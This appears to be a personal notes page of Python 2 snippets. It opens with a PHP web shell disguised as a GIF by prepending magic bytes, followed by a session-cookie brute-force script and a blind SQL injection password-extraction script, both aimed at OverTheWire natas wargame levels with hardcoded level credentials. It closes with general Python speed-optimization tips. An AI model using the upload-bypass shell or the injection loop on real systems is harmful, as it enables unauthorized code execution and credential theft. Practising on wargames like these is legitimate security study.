Add magic numbers to the beginning of the file
fh = open('magic_numbers_gif.php','w')
fh.write('\x47\x49\x46\x38' + '<?php passthru($_GET["cmd"]); ?>') # GIF8<?php passthru($_GET["cmd"]); ?>
fh.close()
##Requests
import requests
from requests.auth import HTTPBasicAuth
for x in range(1, 640):
sessionid = str(str(x) + "-admin").encode("hex")
print "Trying: " + sessionid + ": "+str(x)
r = requests.get("http://natas19.natas.labs.overthewire.org/", auth=HTTPBasicAuth('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs'), cookies={"PHPSESSID":str(sessionid)})
print r
if "You are an admin." in r.text:
print "FOUND: " + str(x)
print r.text
break
Brute force attack
import urllib
import urllib2
cookie='__cfduid=d6d468235c70649795d3603f9283975561442874989;'
url = 'http://natas15.natas.labs.overthewire.org/index.php'
referrer = 'natas15.natas.labs.overthewire.org'
authorization = 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg=='
Chars = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r',
's','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L',
'M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5',
'6','7','8','9']
password = ""
#loop through possible length of password
for i in range(1, 33):
print "%d out of 32" % (i)
#loop through possible chars
for j in range(0,len(Chars)):
sqli = 'natas16" AND LEFT(password, %d) COLLATE latin1_general_cs = "%s' % (i,password + Chars[j])
values = {'username' : sqli}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
req.add_header('Cookie', cookie)
req.add_header('Referrer', referrer)
req.add_header('Authorization', authorization)
try:
response = urllib2.urlopen(req)
the_page = response.read()
#print the_page
except HTTPError, e:
print e.reason
if "This user exists." in the_page:
password+=Chars[j]
print password
break
Optimize for speed
Membership testing O(1)
Use dictionary or set instead of list or tuple.
Searching sequences have O(n)
a in b
String concatenation – join()
Use .join() which has O(n)
+ or += are O(n ** 2)
''.join(seq)
Iterator form over list form
Iterators:
– xrange
– itertools.imap
– generator expressions
– dict.iteritems
List forms
– range
– -map
– – list comprehensions
– dict.items
Iterator forms are more memory friendly and more scalable.
builtin datatypes, extension modules and builtin functions
Use builtin assets whenever possible as the are optimized.
Sorting
Custom sort ordering is best performed with Py2.4’s key= option or with the traditional decorate-sort-undecorate technique. Both approaches call the key function just once per element. In contrast, sort’s cmp= option is called many times per element during a sort. For example, sort(key=str.lower) is faster than sort(cmp=lambda a,b: cmp(a.lower(), b.lower())).
Local variables
Local variables are accessed more quickly than global variables, builtins and attribute lookups.
List comprehensions
List comprehensions run a bit faster than equivalent for-loops.
while 1 / while True
Interpreter optimizes “while 1” to just a single jump. In contrast “while True” takes several more steps. While the latter is preferred for clarity, time-critical code should use the first form.
Multiple assignments
Multiple assignment is slower than individual assignment. For example “x,y=a,b” is slower than “x=a; y=b”. However, multiple assignment is faster for variable swaps. For example, “x,y=y,x” is faster than “t=x; x=y; y=t”.
Chained comparisons
Chained comparisons are faster than using the “and” operator.
Write “x < y < z” instead of “x < y and y < z”.